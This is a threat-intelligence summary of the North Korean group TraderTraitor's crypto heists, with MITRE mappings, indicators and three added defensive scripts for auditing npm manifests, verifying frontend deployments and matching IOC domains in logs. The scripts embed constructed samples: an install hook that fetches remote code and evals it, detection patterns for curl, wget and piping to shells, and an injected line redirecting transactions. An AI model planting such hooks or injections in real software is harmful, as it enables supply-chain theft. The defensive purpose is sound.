TraderTraitor is a North Korean state-sponsored cyber threat group that targets cryptocurrency and blockchain ecosystems through sophisticated social engineering, software supply chain attacks, and compromises of cloud and identity infrastructure. The group has been linked to some of the largest crypto heists on record, including the $308 million DMM Bitcoin breach (2024) and the $1.5 billion Bybit hack (2025). #TraderTraitor #LazarusGroup #DMMBitcoin #Bybit #JumpCloud
Keypoints
- TraderTraitor is a North Korean cyber threat group under the Lazarus umbrella, financially motivated to steal cryptocurrencies such as Bitcoin and Ether.
- The group employs tactics including phishing, trojanized cryptocurrency applications, supply chain compromises, and cloud service breaches targeting blockchain companies and developers.
- Notable operations include the 2024 $308 million theft from the DMM Bitcoin exchange and the 2025 $1.5 billion theft from the Bybit cryptocurrency exchange.
- TraderTraitor has conducted supply chain attacks via malicious open-source packages on npm and PyPI, and in 2023 compromised the identity and device-management provider JumpCloud to reach its downstream cryptocurrency customers.
- They extensively use social engineering, such as fake job offers and coding challenge lures, to compromise developer machines and harvest credentials.
- Once inside a target, the group uses stolen credentials and session tokens to persist and perform reconnaissance in cloud environments, then poisons software supply chains or injects malicious JavaScript into web applications to divert transactions.
- Government agencies including the FBI, CISA, and Japan’s NPA have publicly attributed multiple large-scale cryptocurrency thefts to TraderTraitor, linking it to North Korea’s Reconnaissance General Bureau.
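The malicious npm and PyPI packages and the trojanized applications described above all depend on one thing: code that runs on the developer's machine at install time, before anyone has read it. The script below is an added example (not tooling from the original post or from Wiz) that audits an npm package manifest for lifecycle hooks that fetch or evaluate remote code and for dependencies sourced outside the registry. The manifest, the package name and the `example.invalid` URL are constructed for the demonstration.

```python
"""Audit an npm package manifest for install-time execution and
non-registry dependencies, the two hooks a trojanized package relies on
to run code on a developer workstation. Added example, not code from the
original post."""
import json
import re

# npm lifecycle hooks that run automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Heuristics for install scripts that pull in or execute remote code.
SUSPICIOUS_PATTERNS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b|https?://", re.IGNORECASE),
    "pipe_to_interpreter": re.compile(r"\|\s*(sh|bash|node|python3?)\b"),
    "dynamic_eval": re.compile(r"\beval\(|new Function\(|child_process"),
    "encoded_payload": re.compile(r"base64|atob\(|Buffer\.from\(", re.IGNORECASE),
}

# Dependency specs that bypass the registry (git URLs, tarballs, local paths).
NON_REGISTRY_SPEC = re.compile(r"^(git\+|git://|https?://|file:|github:)")

# Constructed sample manifest modelled on a trojanized crypto-themed package;
# the package name and the example.invalid URL are hypothetical.
SAMPLE_MANIFEST = r"""
{
  "name": "crypto-price-widget",
  "version": "1.4.2",
  "scripts": {
    "postinstall": "node -e \"require('https').get('https://example.invalid/p.js',r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\"",
    "test": "jest"
  },
  "dependencies": {
    "react": "^18.2.0",
    "price-utils": "git+https://example.invalid/price-utils.git"
  }
}
"""


def load_manifest(text):
    """Parse package.json text into a dict."""
    return json.loads(text)


def audit_manifest(manifest):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        indicators = sorted(
            name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(command)
        )
        # Any lifecycle hook is worth a look; one that fetches or evals is high.
        findings.append({
            "kind": "lifecycle_script",
            "where": hook,
            "detail": command,
            "indicators": indicators,
            "severity": "high" if indicators else "medium",
        })
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            if NON_REGISTRY_SPEC.match(spec):
                findings.append({
                    "kind": "non_registry_dependency",
                    "where": section,
                    "detail": f"{name}@{spec}",
                    "indicators": ["unpinned_source"],
                    "severity": "medium",
                })
    return findings


def should_block_install(findings):
    """Policy: refuse to install when any finding is high severity."""
    return any(f["severity"] == "high" for f in findings)


if __name__ == "__main__":
    results = audit_manifest(load_manifest(SAMPLE_MANIFEST))
    for finding in results:
        print(f"[{finding['severity']}] {finding['kind']} in {finding['where']}: "
              f"{finding['detail']} {finding['indicators']}")
    print("block install:", should_block_install(results))
```

Run this against each manifest in `node_modules` after a fresh install in a throwaway environment, or simply install with `npm install --ignore-scripts` and run the audit before allowing lifecycle scripts at all; the heuristics are deliberately loose and meant to surface packages for a human to read, not to replace that reading.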
MITRE Techniques
- [T1566.003] Spearphishing via Service – Attackers send malicious messages via Slack, LinkedIn, Telegram to deliver malware or links (“Malicious messages delivered through Slack, LinkedIn, Telegram.”)
- [T1204.002] User Execution: Malicious File – Victims execute trojanized crypto applications or malicious packages (“Victim runs trojanized crypto app or installs malicious NPM package.”)
- [T1059.007] Command and Scripting Interpreter: JavaScript – TraderTraitor apps use JavaScript and Node.js to execute commands (“TraderTraitor apps use JavaScript and Node.js.”)
- [T1059.006] Command and Scripting Interpreter: Python – Fake coding challenges delivered as Python scripts for execution (“Fake coding challenges delivered as Python scripts.”)
- [T1078] Valid Accounts – Use of stolen credentials like cookies and keys to maintain access (“Stolen credentials (cookies, keys) used to maintain access as a legitimate user.”)
- [T1553.002] Subvert Trust Controls: Code Signing – Malware apps digitally signed with compromised or fraudulent Apple Developer certificates (“Malware apps signed with stolen or fake Apple Developer certs.”)
- [T1105] Ingress Tool Transfer – Malware retrieves second-stage payloads from command and control servers (“Malware retrieves second-stage payloads from attacker C2.”)
- [T1195.001] Compromise Software Dependencies and Development Tools – Use of malicious npm and PyPI packages to compromise development environments (“Malicious NPM/PyPI packages used to compromise dev environments.”)
- [T1195.002] Supply Chain Compromise: Compromise Software Supply Chain – JumpCloud's own update channel was abused to deliver malicious updates to its cryptocurrency customers (“JumpCloud supply chain attack to access downstream crypto firms.”)
- [T1552.001] Unsecured Credentials: Credentials In Files – RN Stealer extracts credentials and cloud configurations from local files (“RN Stealer extracts credentials and cloud configs from files.”)
- [T1550.004] Use Alternate Authentication Material: Web Session Cookie – Stolen session cookies used to impersonate users and pivot internally (“Session cookies used to impersonate users and pivot internally.”)
- [T1580] Cloud Infrastructure Discovery – Enumeration of IAM roles, S3 buckets, and cloud assets (“Enumeration of IAM roles, S3 buckets, and other cloud assets.”)
- [T1578.005] Modify Cloud Compute Infrastructure – Injection of malicious JavaScript into static web frontend applications (“Injection of malicious JavaScript into statically hosted frontend (Next.js app).”)
- [T1087.004] Account Discovery: Cloud Account – Identification of cloud environments and resources to facilitate lateral movement (“Identifies cloud environments and configurations for lateral movement.”)
- [T1204.003] User Execution: Malicious Image – Use of a malicious Docker image to initiate execution (“Use of a malicious Docker image to initiate execution.”)
- [T1041] Exfiltration Over C2 Channel – Sensitive data exfiltrated via HTTPS channel (“Sensitive data (e.g. keys, credentials) exfiltrated via HTTPS.”)
- [T1566.001] Phishing: Spearphishing Attachment – Fake PDF job offers deliver malware (“Fake PDF job offers deliver malware.”)
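The last mile of the Bybit-style intrusion mapped above is a modified JavaScript bundle served from a statically hosted frontend: nothing on the server is exploited, an artifact is simply replaced. The check a practitioner wants is a hash manifest produced at build time, stored outside the bucket that serves the site, and compared against what is actually deployed. The script below is an added example (not from the original post or from any project it names) that builds such a manifest, verifies a deployment against it, and emits Subresource Integrity values for script tags. The file names, the bundle contents and the injected line are constructed.

```python
"""Detect modified, added or missing files in a statically hosted frontend
by comparing deployed objects against a build-time hash manifest. Added
example, not code from the original post; all file contents are constructed."""
import base64
import hashlib


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def sri_hash(data):
    """Subresource Integrity value for a <script integrity=...> attribute
    (sha384, base64), so a browser refuses a bundle that no longer matches."""
    return "sha384-" + base64.b64encode(hashlib.sha384(data).digest()).decode()


def build_manifest(files):
    """Map path -> sha256 for every build artifact. Generate this in CI and
    keep it somewhere the deployment credentials cannot write to."""
    return {path: sha256_hex(content) for path, content in files.items()}


def verify_deployment(manifest, deployed):
    """Compare deployed objects (path -> bytes) with the manifest.
    Returns a sorted list of (finding, path) tuples; empty means clean."""
    findings = []
    for path, expected in manifest.items():
        if path not in deployed:
            findings.append(("missing", path))
        elif sha256_hex(deployed[path]) != expected:
            findings.append(("modified", path))
    for path in deployed:
        if path not in manifest:
            findings.append(("unexpected", path))
    return sorted(findings)


# Constructed build output of a small Next.js-style site (hypothetical paths).
BUILD_OUTPUT = {
    "index.html": b'<html><script src="/_next/static/chunks/app.js"></script></html>',
    "_next/static/chunks/app.js": b"export function sendTx(tx){return wallet.sign(tx)}",
}

# Constructed tampered deployment: the bundle gained a line that rewrites the
# destination of outgoing transactions, and a helper file appeared that the
# build never produced.
TAMPERED_DEPLOYMENT = {
    "index.html": BUILD_OUTPUT["index.html"],
    "_next/static/chunks/app.js": (
        b"export function sendTx(tx){if(tx.value>1e18){tx.to=ATTACKER}return wallet.sign(tx)}"
    ),
    "_next/static/chunks/helper.js": b"window.ATTACKER='0x0000000000000000000000000000000000000000'",
}


if __name__ == "__main__":
    manifest = build_manifest(BUILD_OUTPUT)
    print("clean deployment:", verify_deployment(manifest, BUILD_OUTPUT))
    for finding, path in verify_deployment(manifest, TAMPERED_DEPLOYMENT):
        print(f"{finding:10} {path}")
    print("SRI for app.js:", sri_hash(BUILD_OUTPUT["_next/static/chunks/app.js"]))
```

In practice `deployed` is populated by listing the bucket (or the CDN origin) with read-only credentials from a monitoring account, not with the CI deploy role, so that the same stolen session token that let the attacker write the bundle cannot also silence the check. SRI on the script tags closes the remaining gap for users whose browsers fetch a bundle before the monitor runs, as long as `index.html` itself is covered by the manifest.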
Indicators of Compromise
- [Domain] Command and control infrastructure – getstockprice[.]com (defanged), used for C2 communications in the Bybit attack
- [File Hashes] Malware samples – the RN Loader and RN Stealer Python scripts used for credential theft and system reconnaissance; the hash values themselves are not reproduced on this page
- [Repositories] Malicious JavaScript packages – GitHub repositories and npm packages carrying trojanized crypto-related code used in supply chain attacks
- [IP Addresses] C2 servers contacted by TraderTraitor malware; the addresses are published in Wiz Threat Research's public IOC database and are not reproduced here
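Indicators arrive defanged, as the domain above does, and hunting for them in DNS or proxy logs has to handle subdomains and look-alike hosts correctly or it produces both misses and false hits. The script below is an added example (not from the original post or from Wiz) that refangs indicators, matches a host against a domain indicator and its subdomains only, and runs that over a handful of log lines. The log lines, source addresses and timestamps are constructed.

```python
"""Refang defanged domain indicators and match them against DNS/proxy log
lines, including subdomains but excluding look-alike hosts. Added example,
not from the original post; the log lines are constructed."""
import re

# The one domain indicator given on this page, in its defanged form.
IOC_DOMAINS = ["getstockprice[.]com"]

# Host field as it appears in the constructed log format (hypothetical keys).
HOST_FIELD = re.compile(r"\b(?:query|host|dest_host)[=:]\s*([A-Za-z0-9.-]+)")


def refang(ioc):
    """Turn a defanged indicator back into something comparable to log data."""
    ioc = ioc.strip()
    ioc = re.sub(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]", ".", ioc, flags=re.IGNORECASE)
    ioc = re.sub(r"^hxxp", "http", ioc, flags=re.IGNORECASE)
    return ioc.lower()


def defang(domain):
    """Defang again for reporting so the output is safe to paste anywhere."""
    return domain.replace(".", "[.]")


def domain_matches(host, ioc_domain):
    """True for the domain itself or any subdomain; false for look-alikes
    such as notgetstockprice.com or getstockprice.com.evil.example."""
    host = host.lower().rstrip(".")
    return host == ioc_domain or host.endswith("." + ioc_domain)


def scan_log(lines, ioc_domains):
    """Return a list of hits: which line, which host, which indicator."""
    iocs = [refang(d) for d in ioc_domains]
    hits = []
    for number, line in enumerate(lines, 1):
        match = HOST_FIELD.search(line)
        if not match:
            continue
        host = match.group(1).lower().rstrip(".")
        for ioc in iocs:
            if domain_matches(host, ioc):
                hits.append({"line": number, "host": host, "ioc": defang(ioc)})
    return hits


# Constructed DNS resolver and proxy log lines; addresses and times are made up.
SAMPLE_LOG = [
    "2025-03-01T14:02:11Z src=10.20.3.15 query=api.getstockprice.com type=A",
    "2025-03-01T14:02:12Z src=10.20.3.15 query=github.com type=A",
    "2025-03-01T14:03:40Z src=10.20.3.15 query=GETSTOCKPRICE.COM. type=A",
    "2025-03-01T14:05:02Z src=10.20.3.17 query=getstockprice.com.evil.example type=A",
    "2025-03-01T14:05:09Z src=10.20.3.17 dest_host=notgetstockprice.com method=GET",
]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG, IOC_DOMAINS):
        print(f"line {hit['line']}: {hit['host']} matched {hit['ioc']}")
```

Two of the five lines should match: the subdomain on the first line and the bare domain, with a trailing dot and upper case, on the third. The two look-alikes are the cases that a naive substring search would report and that a suffix check without the leading dot would also report.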
Read more: https://www.wiz.io/blog/north-korean-tradertraitor-crypto-heist